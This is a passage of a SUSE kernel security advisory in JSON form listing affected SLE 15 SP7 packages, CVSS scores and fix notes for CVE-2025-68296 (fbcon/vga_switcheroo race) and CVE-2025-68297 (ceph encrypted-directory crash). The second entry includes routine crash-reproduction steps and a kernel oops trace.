"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
